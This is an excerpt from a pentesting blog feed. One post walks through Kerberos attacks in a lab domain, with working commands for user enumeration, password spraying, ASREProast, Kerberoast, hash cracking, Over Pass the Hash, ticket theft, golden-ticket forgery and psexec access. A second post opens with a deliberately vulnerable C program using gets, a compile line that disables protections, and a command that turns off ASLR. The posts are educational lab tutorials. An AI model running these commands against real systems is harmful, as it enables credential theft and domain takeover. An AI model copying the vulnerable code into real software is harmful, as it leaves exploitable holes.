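```python
# Toy model of the two Kerberos round trips (illustrative only).
def as_exchange(username):
    # AS-REQ -> AS-REP: the KDC hands back a TGT for the authenticated user
    return {"msg": "AS-REP", "user": username, "tgt": f"TGT({username})"}

def tgs_exchange(tgt, spn):
    # KRB-TGS-REQ -> KRB-TGS-REP: the TGT buys a service ticket for one SPN
    return {"msg": "KRB-TGS-REP", "tgs": f"TGS({tgt} -> {spn})"}

as_rep = as_exchange("alice")
tgs_rep = tgs_exchange(as_rep["tgt"], "cifs/fileserver")
print(tgs_rep["tgs"])  # TGS(TGT(alice) -> cifs/fileserver)
```

One TGT, obtained once, is reused to request as many per-service TGS tickets as needed; this is the flow the diagram above depicts.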

## Delving into Kerberos: The First Step to Domain Authentication

![img](/content/images/2023/06/2023-06-12_09-27-47_screenshot.png)

Diagram of step 1

Let&apos;s break down the Kerberos authentication process, starting from square one. Imagine you&apos;re at the gates of the digital domain, ready to prove your identity. This is where the Kerberos magic begins, a process initiated by the user sending a special request called &quot;AS-REQ&quot; to the domain&apos;s Key Distribution Center (KDC).

In this request, the user includes:

1.  Their username - like calling out your name to the gatekeeper.
2.  A request for the Ticket Granting Ticket (TGT) - akin to asking for an entry pass.
3.  A timestamp, but not just any timestamp. It&apos;s encrypted with the user’s NT hash, a secret code that ensures the user&apos;s authenticity.

This initial interaction lays the groundwork for Kerberos-based authentication. It&apos;s also the stage vulnerable to specific attacks like &quot;Pass the Key&quot; or &quot;Over Pass the Hash,&quot; which we&apos;ll explore later. Think of it as the opening scene of a cybersecurity drama, where the stage is set for both secure access and potential exploits.

## Step 2: The KDC Rolls Out the Red Carpet with a TGT Ticket

![img](/content/images/2023/06/2023-06-12_09-38-16_screenshot.png)

Diagram of step 2 

Once the user&apos;s initial appeal passes the security checks, the server, playing the role of a grand host, presents the coveted Ticket Granting Ticket (TGT) along with a session key. This ceremonial pass is wrapped up in a message dubbed “AS-REP,” marking the user&apos;s successful entry into the domain’s digital ballroom.

Here&apos;s what the AS-REP message ceremoniously unveils:

1.  **Authenticated Username**: Like a badge of honor, confirming the user&apos;s identity.
2.  **The TGT’s Duration and a Session Key**: Encrypted with the user’s NT hash, this session key is a skeleton key of sorts for the upcoming requests to various domain services. It&apos;s a promise of future accesses.
3.  **The TGT Itself**: This ticket is not just a simple pass. It&apos;s imbued with the session key, its validity period, and the Privilege Attribute Certificate (PAC). The PAC is like a detailed résumé of the user – listing their domain groups and roles. Importantly, this ticket is sealed with the NT hash of the KRBTGT account – a special account nestled within the domain controllers. Think of KRBTGT as the master key holder, with its hash being a master key. If someone were to replicate this hash, they could potentially unlock the entire domain, creating their own TGT tickets.

In essence, Step 2 is where the server grants the user a golden ticket to access the domain&apos;s resources, ensuring that the journey ahead is authenticated and authorized.

## Step 3: Knocking on the Service&apos;s Door with a TGS Request

![](/content/images/2023/06/image-14.png)

Diagram of step 3

Now, the user, equipped with the TGT from the previous step, is ready to step up and request a specific domain service. This quest for access is encapsulated in a message known as &quot;KRB-TGS-REQ,&quot; a formal request to the Kerberos gods for a Ticket Granting Service (TGS) ticket.

Here&apos;s what the user packs into this request:

1.  **The Service Name (SPN)**: Think of it as dialing the extension of the specific department in a vast corporate building. The Service Principal Name or SPN precisely identifies the service the user wishes to access. It&apos;s like saying, &quot;I need to talk to the manager of the &apos;File Sharing&apos; department.&quot;
2.  **Username and a Time-stamped Token**: To prove their identity and intention, the user includes their username coupled with a timestamp. But it&apos;s not just any timestamp; it&apos;s encrypted with the session key handed over in the previous message. It’s akin to showing a secret handshake – a way to confirm their authenticity.
3.  **The TGT Ticket**: This is the golden ticket received earlier. Presenting this ticket is like showing a VIP pass, proving that the user has been previously authenticated and is cleared to make further requests within the domain.

In a nutshell, Step 3 is where the user, armed with their TGT, makes a specific request to access a domain service. It&apos;s like approaching a concierge with a verified pass and asking for entry into an exclusive club within the grand domain estate.

## Step 4: Receiving the Golden Pass - The TGS Ticket

![](/content/images/2023/06/2023-06-13_08-34-03_screenshot.png)

Diagram of step 4

The moment of truth arrives in Step 4 of the Kerberos process. If the TGT sent by the user passes muster with the Key Distribution Center (KDC), it responds with a prized possession: the TGS (Ticket Granting Service) ticket, encapsulated in a message known as &quot;KRB-TGS-REP.&quot; This ticket is the user&apos;s gateway to the requested service. Here&apos;s what&apos;s inside this all-important response:

1.  **Client-Only Decipherable Content**: This section of the message is a treasure trove, but only for the client&apos;s eyes. It contains the service&apos;s name, a fresh timestamp, and a unique session key for the service. This part is like a confidential memo, sealed in an envelope that only the client can open, as it&apos;s encrypted using the session key provided in Step 2.
2.  **Service-Specific TGS**: The second part of the message is the TGS itself, tailored specifically for the requested service. This section is encrypted with the NT hash of the service owner, meaning only the server hosting the service can decrypt it. Packed inside are the user&apos;s name, the service name, the service&apos;s session key, a token detailing the user&apos;s privileges in the domain, and a timestamp.

In essence, Step 4 is where the KDC validates the user&apos;s request and bestows upon them the TGS ticket - a golden pass, granting access to the requested service. It’s as if the concierge, after verifying the VIP pass, hands over a special key that unlocks the doors to the exclusive club the user wished to enter.

## Step 5 to 7: The Final Stages of Kerberos Authentication

The Kerberos journey reaches its climax in these final steps, where the client&apos;s request meets the service&apos;s scrutiny, and mutual verification takes place.

### Step 5: Delivering the TGS to the Service Server

**Ticket Presentation (KRB-AP-REQ)**: In this crucial phase, the client sends the TGS ticket to the desired service. This is done through a message known as the KRB-AP-REQ. It&apos;s akin to presenting an exclusive pass at a high-security event. The service, acting as a vigilant bouncer, examines the ticket to validate its authenticity, ensuring it can be decrypted with the service account&apos;s key.

### Step 6: Optional Service Ticket Verification

**Guarding Against Silver Ticket Attacks**: This step, while optional, acts as an additional layer of security. The service can forward the ticket&apos;s Privilege Attribute Certificate (PAC) to the KDC, which verifies its signature. This check is a safeguard against potential Silver Ticket attacks, where attackers forge service tickets to gain unauthorized access to services.

### Step 7: Confirming the Server&apos;s Identity

**Server&apos;s Assurance (KRB-AP-REP)**: The final acknowledgment comes from the server, which sends back a message, the KRB-AP-REP. This message includes the client&apos;s timestamp, encrypted with the session key. It’s the server&apos;s way of saying, &quot;Yes, it&apos;s really me.&quot; This mutual authentication ensures both parties are confident in each other&apos;s identity, akin to a secret handshake in a spy movie.

These steps complete the intricate dance of Kerberos authentication. It&apos;s a process where trust is established through a series of coded messages, each playing a critical role in maintaining the security and integrity of the communication between a user and the services within a domain.

# Main Kerberos Attacks: Unraveling Kerberos&apos; Vulnerabilities

Kerberos, the guardian of authentication in many domains, isn&apos;t impervious to attacks. Let’s delve into the primary attacks targeting the Kerberos protocol and how they can be executed.

## Kerberos Brute-Force Attack: Cracking the Code

Kerberos, being an authentication protocol, is susceptible to brute-force attacks. These attacks aim to validate credentials within the domain. The Kerberos system provides specific error messages for various scenarios, making it possible to identify the nature of the failure. Examples include:

-   **KDC-ERR-PREAUTH-FAILED**: Indicates an incorrect password.
-   **KDC-ERR-C-PRINCIPAL-UNKNOWN**: Flags an invalid username.
-   **KDC-ERR-WRONG-REALM**: Signals an invalid domain.
-   **KDC-ERR-CLIENT-REVOKED**: Denotes a disabled or blocked user.

These distinct responses facilitate not just the brute-forcing of passwords, but also the enumeration of users.
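These distinct responses lend themselves to simple automation. The sketch below (an illustrative helper, not part of any existing tool; the error names follow the underscore style of RFC 4120) maps each code to what it reveals about the attempted principal:

```python
# Map Kerberos KDC error codes to what they reveal during brute-forcing.
# Illustrative triage helper; the codes mirror the list above.
KDC_ERRORS = {
    "KDC_ERR_PREAUTH_FAILED": ("valid user", "wrong password"),
    "KDC_ERR_C_PRINCIPAL_UNKNOWN": ("invalid user", None),
    "KDC_ERR_WRONG_REALM": ("invalid domain", None),
    "KDC_ERR_CLIENT_REVOKED": ("disabled or locked user", None),
}

def triage(error_code):
    """Return what a KDC error tells us about the attempted principal."""
    return KDC_ERRORS.get(error_code, ("unknown response", None))

print(triage("KDC_ERR_PREAUTH_FAILED"))
print(triage("KDC_ERR_C_PRINCIPAL_UNKNOWN"))
```

A scanner built around such a table can separate user enumeration results from password-guessing results in a single pass over the responses.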

### Harnessing Kerbrute for Non-Intrusive User Enumeration

Kerbrute stands out as a highly recommended tool for user enumeration in Kerberos-based systems, particularly for its ability to perform the task without risking account lockouts. This feature is invaluable during internal pentesting, allowing for the accumulation of a user list without alerting system administrators or disrupting user activities.

The command `./kerbrute_linux_amd64 userenum -d shadow.local usernames.txt` serves as a gateway to effectively enumerate users within the domain &apos;shadow.local&apos;, using a list of potential usernames. This list can be curated from various sources, including the insightful GitHub repository &quot;insidetrust/statistically-likely-usernames&quot;.

![](/content/images/2023/06/image-15.png)

Kerbrute example to enumerate users

This GitHub repository offers a compilation of wordlists specifically designed for creating statistically probable usernames. These lists are tailored for password attacks and security testing, making them a perfect companion for tools like Kerbrute. The advantage of using these lists lies in their non-intrusive nature, ensuring that the enumeration process does not trigger account lockouts, thus maintaining stealth and efficiency in pentesting scenarios.

The usernames identified through this process can serve as a foundation for further attacks, such as the “ASREProast” technique, which will be discussed in subsequent sections. The ability to accumulate a list of potential targets without alerting the network&apos;s defenses marks a significant step in the penetration testing process.

For those interested in exploring and utilizing these wordlists, visit the GitHub repository: [insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames). This resource provides an array of wordlists that are pivotal for successful user enumeration and subsequent penetration testing strategies.
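The idea behind such wordlists can be sketched in a few lines. The helper below is a hypothetical illustration of the kind of format expansion these lists perform; the chosen formats are an assumption covering common corporate naming conventions:

```python
# Generate common Active Directory username formats from a real name,
# in the spirit of the statistically-likely-usernames wordlists.
# The format list is an assumption, not taken from that repository.
def candidate_usernames(first, last):
    f, l = first.lower(), last.lower()
    return [
        f + l,        # johnsmith
        f + "." + l,  # john.smith
        f[0] + l,     # jsmith
        f + l[0],     # johns
        l + f[0],     # smithj
    ]

for user in candidate_usernames("John", "Smith"):
    print(user)
```

Feeding the output of such a generator into `kerbrute userenum` turns a list of employee names into a list of likely account names.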

### Brute Force and Password Spraying

While `kerbrute` can also perform brute force and password spraying attacks to discover valid domain credentials, caution is advised. These methods can lead to account lockouts, contingent on the domain&apos;s password policy. An example of a password spraying attack would be testing a common password across multiple users, with a safety feature to halt the attack if lockouts are detected.

```bash
./kerbrute_linux_amd64 passwordspray -d shadow.local usernames.txt Password123 --safe

```

![](/content/images/2023/06/image-16.png)

Password spraying attack with kerbrute
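The lockout-safety idea behind the `--safe` flag can be sketched as follows. This is purely illustrative logic with a simulated directory and a stand-in `try_login` function, not kerbrute&apos;s actual implementation:

```python
# Illustrative sketch of lockout-aware password spraying (not kerbrute itself).
# try_login is a stand-in returning "ok", "bad_password", or "locked".
def spray(users, password, try_login, max_lockouts=1):
    found, lockouts = [], 0
    for user in users:
        result = try_login(user, password)
        if result == "ok":
            found.append(user)
        elif result == "locked":
            lockouts += 1
            if lockouts >= max_lockouts:
                # Halt immediately once lockouts appear, mirroring --safe.
                break
    return found

# Simulated directory for demonstration purposes only.
fake_dir = {"alice": "Password123", "bob": "Winter2023", "carol": "LOCKED"}

def try_login(user, password):
    if fake_dir.get(user) == "LOCKED":
        return "locked"
    return "ok" if fake_dir.get(user) == password else "bad_password"

print(spray(["alice", "bob", "carol"], "Password123", try_login))  # ['alice']
```

The key design point is that the spray aborts as soon as a lockout is observed, trading coverage for stealth and for not disrupting legitimate users.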

### User=Pass Technique

An intriguing method involves testing scenarios where the username is the same as the password. It&apos;s surprisingly effective at times.

```bash
cat userpass.txt | ./kerbrute -d shadow.local bruteforce -

```
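Generating the `userpass.txt` combo list is trivial, since kerbrute&apos;s bruteforce mode reads one `user:password` pair per line. A minimal sketch, using a hypothetical in-memory username list instead of a file:

```python
# Build a user=pass combo list (username:username per line) for
# kerbrute's bruteforce mode, which reads user:password pairs.
def userpass_lines(usernames):
    return [u + ":" + u for u in usernames]

usernames = ["beruinsect", "ironhammer", "sqlservice"]  # example list
for line in userpass_lines(usernames):
    print(line)
```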

## Unlocking Secrets with ASREProast: A Deep Dive into Kerberos Authentication Exploitation

![](/content/images/2023/06/image-17.png)

ASREProast diagram

Imagine a scenario where we&apos;ve successfully enumerated domain users, but without acquiring any passwords. This is where the &quot;ASREProast&quot; attack, a sophisticated method targeting the second step of the Kerberos authentication process (AS-REP), comes into play. The crux of this technique lies in requesting Ticket Granting Tickets (TGTs) without providing the timestamp encrypted with the user&apos;s NT hash, effectively bypassing pre-authentication requirements.

This vulnerability stems from an option in Active Directory settings that allows certain users to bypass pre-authentication. By leveraging this setting, attackers can intercept the AS-REP message from the server, which includes a part encrypted with the user’s NT hash. The ultimate goal? To decrypt this hash and reveal the user&apos;s plaintext password.

One of the potent tools in executing the ASREProast attack is the &quot;impacket-GetNPUsers&quot; script from the Impacket suite. For instance, the command `impacket-GetNPUsers &apos;shadow.local/beruinsect:Password3&apos; -dc-ip 192.168.253.130 -outputfile asreproast-hashes.txt` is designed to exploit this vulnerability. However, it&apos;s crucial to note that this attack only works if the user’s account is configured to bypass Kerberos pre-authentication.

In cases where this configuration is not set and the attack yields an error, the option can be enabled via Active Directory management tools - for instance, in a lab environment. After disabling Kerberos pre-authentication for the user, re-running the attack captures the hash successfully.

![](/content/images/2023/06/image-18.png)

The user does not have the pre-authentication option enabled.

![](/content/images/2023/06/image-19.png)

Configuration to be set to make the user vulnerable

![](/content/images/2023/06/image-20.png)

Successful attack

Once the hash is obtained, it can be subjected to password cracking tools like Hashcat. A typical command like `hashcat -m 18200 --force -a 0 asreproast-hashes.txt pass.txt` can be employed to crack the hash and expose the user’s password.

![](/content/images/2023/06/image-23.png)

Cracking of AS-REP to obtain user passwords
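Picking the right hashcat mode can be automated from the hash prefix itself: AS-REP hashes (RC4, etype 23) begin with `$krb5asrep$23$` and use mode 18200, while the Kerberoast TGS hashes seen later begin with `$krb5tgs$23$` and use mode 13100. A small illustrative helper:

```python
# Pick the hashcat mode from the Kerberos hash prefix.
# $krb5asrep$23$... -> mode 18200 (AS-REP, RC4)
# $krb5tgs$23$...   -> mode 13100 (Kerberoast TGS, RC4)
def hashcat_mode(hash_line):
    if hash_line.startswith("$krb5asrep$23$"):
        return 18200
    if hash_line.startswith("$krb5tgs$23$"):
        return 13100
    raise ValueError("unrecognized or non-RC4 Kerberos hash")

print(hashcat_mode("$krb5asrep$23$beruinsect@SHADOW.LOCAL:1a2b..."))  # 18200
```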

For broader exploitation, the &quot;impacket-GetNPUsers&quot; script also permits the use of a user list file, enhancing the attack&apos;s efficiency by allowing the extraction of AS-REP messages from multiple users simultaneously. The command for this broader approach would be:

```bash
impacket-GetNPUsers -userfile usernames.txt -dc-ip 192.168.253.130 -format hashcat -outputfile asreproast-hashes.txt

```

![](/content/images/2023/06/image-24.png)

ASREProast attack via user listing

## Harnessing Kerberoast: Targeting the Heart of Kerberos TGS Exchange

![](/content/images/2023/06/image-25.png)

Part of the authentication process affected by the Kerberoast attack.

Kerberoast is a formidable attack vector that targets a critical juncture in the Kerberos authentication process—the point where the user receives the Ticket Granting Service (TGS) ticket, a key step in the Kerberos TGS Exchange (Step 4: KRB-TGS-REP). This attack is particularly insidious because it exploits the encryption of part of the message with the NT hash of the service account. By cracking this encryption, attackers can unveil the clear text password of the service account.

The attack is primarily directed at service accounts linked to user accounts, rather than those tied to computer accounts. The latter often possess complex, automatically generated passwords, making them less vulnerable. However, user-linked service accounts often have weaker, user-defined passwords and tend to carry high-level domain privileges, making them ripe targets for exploitation.

Understanding Service Principal Names (SPNs) is crucial for this attack. SPNs are unique identifiers for services within an Active Directory environment, formatted as `service_class/machine_name[:port][/path]`. To register a service tied to a user account in a domain, one would use a command like:

```bash
setspn -a DC-SHADOW/SQLService.shadow.local:60111 SHADOW\SQLService

```

This command creates an SPN for a service, linking it to a specific user account. Verification of the SPN creation can be done using:

```bash
setspn -T shadow.local -Q */*

```
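The SPN shape described above can be parsed mechanically. The following is an illustrative parser for the `service_class/machine_name[:port][/path]` format, not part of any existing tool:

```python
# Parse an SPN of the form service_class/host[:port][/path].
def parse_spn(spn):
    service_class, _, rest = spn.partition("/")
    host_port, _, path = rest.partition("/")
    host, _, port = host_port.partition(":")
    return {
        "service_class": service_class,
        "host": host,
        "port": int(port) if port else None,
        "path": path or None,
    }

print(parse_spn("DC-SHADOW/SQLService.shadow.local:60111"))
```

Splitting SPNs like this is handy when triaging `setspn -Q` output, since user-linked services can be grouped by service class or host before launching Kerberoast.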

For executing the Kerberoast attack, one needs a valid domain account, as it requires a TGT to request TGSs from the domain controller. The GetUserSPNs.py script from Impacket, for instance, is designed to facilitate this process:

```bash
GetUserSPNs.py &apos;shadow.local/beruinsect:Password4&apos; -dc-ip 192.168.253.130 -outputfile kerberoast-hashes.txt

```

![](/content/images/2023/06/image-26.png)

Successful Kerberoast attack

Once the TGS ticket is acquired, attackers can employ password-cracking tools like Hashcat to decrypt the service account password:

```bash
hashcat -m 13100 --force -a 0 kerberoast-hashes.txt pass.txt

```

![](/content/images/2023/06/image-27.png)

Successful brute force attack

## Mastering &apos;Over Pass the Hash&apos; in Kerberos Authentication

The &apos;Over Pass the Hash&apos; attack is a clever maneuver in the Kerberos authentication landscape, focusing on a key aspect of the process: In Step 1 (Domain Authentication), a user&apos;s clear password isn&apos;t mandatory for requesting TGT (Ticket Granting Ticket) tickets; instead, their NT hash suffices. This attack exploits this facet by substituting the user&apos;s NT hash for their actual password to acquire valid TGT tickets, enabling domain authentication.

![](/content/images/2023/06/image-28.png)

Affected part of the authentication process by the &quot;Over Pass The Hash&quot; attack.

The primary tool for this attack is Impacket&apos;s `getTGT`, which facilitates the acquisition of TGT tickets using a user&apos;s NT hash. Here&apos;s an example of how the `getTGT` command is used:

```bash
impacket-getTGT shadow.local/ironhammer -hashes :7247e8d4387e76996ff3f18a34316fdd -dc-ip 192.168.253.130

```

![](/content/images/2023/06/image-29.png)

TGT ticket request

Post-acquisition of the TGT ticket, attackers can leverage tools like `psexec` for authentication and accessing target machines. Remember, Kerberos authentication demands the hostname, not the IP address of the target. Setting the appropriate environment variable is essential:

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/ironhammer.ccache

impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.131 -no-pass -k shadow.local/ironhammer@pc-beru.shadow.local

```

![](/content/images/2023/06/image-30.png)

Execution of psexec via kerberos authentication

An intriguing facet of this attack is its versatility: it can be executed using Kerberos keys as an alternative to the NT hash. Kerberos keys, pivotal in ticket and message encryption, are often cached in the Local Security Authority Subsystem Service (LSASS). Tools like Mimikatz or secretsdump are adept at extracting these keys. For instance, a dump of the NTDS (Active Directory database) using secretsdump can reveal these keys.

![](/content/images/2023/06/image-44.png)

NTDS dump to obtain beruinsect user key

![](/content/images/2023/06/image-45.png)

Obtaining the user&apos;s ticket via his kerberos key

## Understanding &apos;Pass the Ticket&apos; in Kerberos Authentication

![](/content/images/2023/06/image-31.png)

Pass the ticket technique

The &apos;Pass the Ticket&apos; attack revolves around the strategic acquisition and utilization of Kerberos tickets, specifically TGT (Ticket Granting Ticket) and TGS (Ticket Granting Service). The core idea is to use these tickets—obtained through LSASS content dumping via tools like Mimikatz or lsassy—for accessing various domain services.

The process begins with ticket extraction. For instance, using the `lsassy` tool, we can retrieve Kerberos tickets with a command like:

```bash
lsassy -d shadow.local -u ironhammer -p Password4 192.168.253.131 -K tickets

```

![](/content/images/2023/06/image-38.png)

Running lsassy to get kerberos tickets

Exploring the extracted tickets reveals a treasure trove of information, including multiple user TGTs and TGSs for various services, such as Samba (cifs\_dc-shadow) or LDAP (ldap\_dc-shadow). Each ticket is linked to a specific user, providing insights into their domain access privileges.

![](/content/images/2023/06/image-42.png)

Example of tickets

To make these tickets usable for attacks, they often need to be converted to a different format. This is where the &apos;impacket-ticketConverter&apos; tool comes into play, transforming tickets from .kirbi to .ccache format. Once converted, setting the `KRB5CCNAME` environment variable is crucial for leveraging these tickets with various tools. For instance:

![](/content/images/2023/06/image-41.png)

&lt;details&gt;
&lt;summary&gt;Convert ticket to format usable by impacket&lt;/summary&gt;

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/tickets/beru.ccache

```
&lt;/details&gt;


This setup enables the use of tools like Impacket&apos;s `psexec` for authentication, similar to what is done in &apos;Pass the Hash&apos; but with the added advantage of utilizing actual Kerberos tickets.

## The Intricacies of Golden and Silver Tickets in Kerberos

Golden and Silver Tickets represent two potent forms of attacks within the Kerberos authentication protocol, each leveraging different aspects of the system.

**Golden Tickets**: These are akin to master keys, allowing attackers to forge TGT (Ticket Granting Tickets) for any user. The linchpin for this attack is the krbtgt account – the central figure in the Kerberos ticketing system. Compromising this account, specifically obtaining its NT hash, is crucial. Once this is achieved, attackers can use tools like Impacket’s `ticketer` to create TGTs for any user, thus gaining broad access to domain services.

![](/content/images/2023/06/image-34.png)

Domain SID

![](/content/images/2023/06/image-35.png)

NT hash of the krbtgt account

To execute this attack, one needs the domain&apos;s SID and the krbtgt account’s NT hash. With these in hand, crafting a TGT for even the domain administrator is possible. For example:

```bash
impacket-ticketer -domain-sid  S-1-5-21-1545742773-2923955266-673312136 -nthash 011948128d80ec39af3a837c5d153dea -domain shadow.local administrator

```

![](/content/images/2023/06/image-36.png)

ticketer to create a TGT ticket of the admin user

Post-creation, the ticket can be used for domain authentication as seen in:

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/administrator.ccache
impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.130 -no-pass -k shadow.local/administrator@dc-shadow.shadow.local

```

![](/content/images/2023/06/image-37.png)

Remote execution of commands through kerberos authentication

**Silver Tickets**: These focus on forging TGS (Ticket Granting Service) tickets for specific services. Instead of needing the krbtgt account’s NT hash, the Silver Ticket attack requires the NT hash of the account running the targeted service. This specificity makes Silver Tickets less sweeping in scope compared to Golden Tickets but still incredibly powerful for accessing particular services.
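The ingredients of the two forgeries can be summarized in a few lines of illustrative code (the secret names are informal labels for this sketch, not identifiers from any tool):

```python
# What each ticket-forgery attack requires, per the description above.
REQUIREMENTS = {
    "golden": {"krbtgt NT hash", "domain SID"},
    "silver": {"service account NT hash", "target SPN"},
}

def can_forge(ticket_type, secrets):
    """Return True if the compromised secrets cover the attack needs."""
    return REQUIREMENTS[ticket_type].issubset(secrets)

loot = {"krbtgt NT hash", "domain SID"}
print(can_forge("golden", loot))  # True
print(can_forge("silver", loot))  # False
```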

# **Embracing Kerberos: Understanding and Safeguarding**

In this exploration of the Kerberos authentication protocol, we&apos;ve journeyed through its intricate workings and uncovered the potent attacks that target its core mechanisms. From the fundamental steps of the Kerberos process to the sophisticated strategies of Golden and Silver Ticket attacks, our expedition into this realm has been enlightening.

We delved into various attack methodologies, such as Kerberos brute-force, ASREProast, Kerberoast, and the Over Pass the Hash technique. Each of these exploits highlights a unique vulnerability within the Kerberos system, underscoring the importance of robust security practices in managing and safeguarding authentication processes.

This chapter not only enhances our understanding of Kerberos but also arms us with the knowledge to replicate these attacks in a controlled lab environment. Such practical insights are invaluable in fortifying our defenses against real-world threats.

As we wrap up this chapter, it&apos;s clear that the Kerberos protocol, while robust and sophisticated, is not impervious to exploits. Vigilance, constant learning, and adapting to emerging threats remain our best tools in the ever-evolving landscape of cybersecurity. Let&apos;s continue to embrace these challenges with a keen eye and a readiness to evolve, ensuring the integrity and security of our digital realms. Happy hacking!

# Tips of the article


&lt;details&gt;
&lt;summary&gt;Could you explain to me at a high level what Kerberos is and how it works ?&lt;/summary&gt;

Kerberos, as discussed in previous chapters, is a protocol that enables user authentication and authorization processes. This is done through what are known as Kerberos tickets. When a user wants to authenticate in the domain via Kerberos, they do so against the KDC or Key Distribution Center (the domain controller), which, in case of success, will return a ticket called TGT or Ticket Granting Ticket. The user will send this ticket to the KDC every time they want to authenticate against any service in the domain. In turn, the KDC will return a TGS or Ticket Granting Service ticket to the user. The user will send this ticket to the machine running the service, which will check whether the ticket is valid, as well as whether the user has a sufficient level of authorization. This whole process is summarized in the following diagram:

![img](/content/images/2023/06/2023-06-06_09-02-39_screenshot.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What tool can I use to enumerate kerberos users? Can this enumeration process block users?&lt;/summary&gt;

We could use &quot;Kerbrute&quot;. This tool does not block users during the user enumeration process because it does not cause login errors.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the ASREProast attack? What information do I need to perform the ASREProast attack? Which tool can I use to perform it?&lt;/summary&gt;

The ASREProast attack mainly consists in requesting TGTs without providing the timestamp encrypted with the user’s NT hash, thus making pre-authentication unnecessary. To perform this attack I only need a list of users that I know exist in the domain, and I can use the Impacket tool GetNPUsers.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What does the &quot;Kerberoast&quot; attack consist of? What tool could you use to carry out this attack?&lt;/summary&gt;

This attack consists of requesting service tickets (TGS) from the domain controller and then trying to crack them. These service tickets should correspond to user accounts; otherwise it will be practically impossible to crack them due to the complexity of computer account passwords. To carry out this attack we can use the Impacket tool GetUserSPNs.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is Over Pass The hash ? What tool can we use to carry out this attack?&lt;/summary&gt;

It consists of requesting TGT tickets without knowing the user&apos;s password, using their NT hash instead. To perform this attack I can use the Impacket script getTGT.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What does the &quot;Pass the Ticket&quot; attack consist of? What environment variable do I have to configure in Linux to use this ticket?&lt;/summary&gt;

It consists of using TGTs or TGSs to authenticate to a certain service. The environment variable to be configured is called &quot;KRB5CCNAME&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do we mean by &quot;Golden Ticket&quot; and &quot;Silver Ticket&quot;? What do I need to form a &quot;Golden Ticket&quot;?&lt;/summary&gt;

First, in the case of Golden Tickets, it consists of the ability to generate TGT tickets for any user. To do this, it is required to have compromised the krbtgt account, whose credentials, as we saw in the Kerberos authentication process, are the ones used to encrypt the TGT content.  
Silver Tickets, on the other hand, refer to the possibility of creating TGS tickets for a given service. In order to do this, we must have obtained the NT hash of the account that is running the service.

To forge a Golden Ticket I need to know the domain SID, as well as have the NT hash or password of the krbtgt account.
&lt;/details&gt;

# Resources

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploiting Buffer Overflow: Crafting Interactive Shell Exploits with Shellcode</title><link>https://www.kayssel.com/post/shellcode-injection</link><guid isPermaLink="true">https://www.kayssel.com/post/shellcode-injection</guid><description>This chapter combines shellcode knowledge and buffer overflow exploitation to gain shell access through a vulnerable program. It includes using pwndbg for detailed analysis and advanced pwntools for crafting effective exploits, bridging theory and practice.</description><pubDate>Sun, 04 Jun 2023 14:27:55 GMT</pubDate><content:encoded># **Integrating Shellcode and Buffer Overflow for Interactive Shell Access**

In this chapter of our series, we delve into the practical application of shellcode and buffer overflow knowledge, culminating in gaining an interactive shell through a vulnerable program. This journey is not just about applying concepts but mastering the art of exploit development using advanced tools.

**What You&apos;ll Learn:**

1.  **Applying Shellcode Knowledge:** We&apos;ll explore how to effectively utilize our understanding of shellcode. This involves crafting precise payloads that interact with the vulnerable program&apos;s memory and execution flow.
2.  **Exploiting Buffer Overflow:** The focus will be on exploiting buffer overflow vulnerabilities to manipulate program behavior. This crucial step is where theoretical knowledge meets practical application.
3.  **Mastering Pwndbg:** A key part of this chapter is learning how to use pwndbg, a powerful enhancement to GDB. This tool provides deeper insights into the program’s execution and helps in fine-tuning our exploit.
4.  **Advanced Use of Pwntools:** We&apos;ll go beyond the basics of the pwntools library. Here, we&apos;ll see how its advanced features can streamline the process of exploit development, particularly in creating and deploying shellcodes.

**Who Should Engage:**

This chapter is designed for individuals who have been following our series and have a foundational understanding of shellcode and buffer overflow. It&apos;s ideal for cybersecurity enthusiasts and professionals who are keen to elevate their skills in practical exploit development.

**The Journey Ahead:**

As we embark on this chapter, prepare to bridge the gap between theory and practice. The skills and techniques acquired here are not just crucial for offensive cybersecurity but also invaluable for defensive strategists seeking to understand and mitigate such exploits. Let&apos;s dive in and experience the thrill of turning vulnerabilities into opportunities for gaining shell access.

# **Exploiting Buffer Overflows: A Strategic Approach to Shellcode Injection**

In this chapter, we build on the insights from [chapter 5](https://www.kayssel.com/post/binary-exploitation-5-smash-the-stack/), focusing on exploiting a buffer overflow vulnerability in the `gets` function. Our goal is to manipulate the program&apos;s execution flow, allowing us to inject and execute our shellcode.

## **Analyzing the Vulnerable Code**

Consider the following simple C program, which contains a critical vulnerability:

```c
//stack5 program
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
	char buffer[64];
	gets(buffer);
}

```

Vulnerable code

## **Developing the Exploitation Strategy**

Our exploitation strategy involves carefully crafting the input to the `buffer` variable. This input will include our shellcode, followed by padding to fill up the space up to the return address. We then inject the memory address of the top of the stack (`esp`) to ensure that our shellcode is executed upon returning from the `main` function.

The following illustration provides a visual summary of this strategy:

![](/content/images/2023/06/image.png)

Attack diagram

## **Compiling the Vulnerable Program**

To compile the program and create an executable that bypasses certain operating system restrictions, we use this command:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack5 stack5.c

```

This command disables protections such as stack canaries (`-fno-stack-protector`) and PIE (`-no-pie`), and marks the stack executable (`-z execstack`) - all crucial for our exploitation experiment.

## **Disabling Address Space Layout Randomization (ASLR):**

Finally, to eliminate the randomness in memory address assignments, we disable ASLR with the following command:

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

```

Avoid ASLR

# **Manipulating Program Flow via Buffer Overflow Exploitation**

In this critical section, we&apos;ll harness the buffer overflow vulnerability in the program to alter its execution flow. This approach is essential for successful shellcode injection and execution.

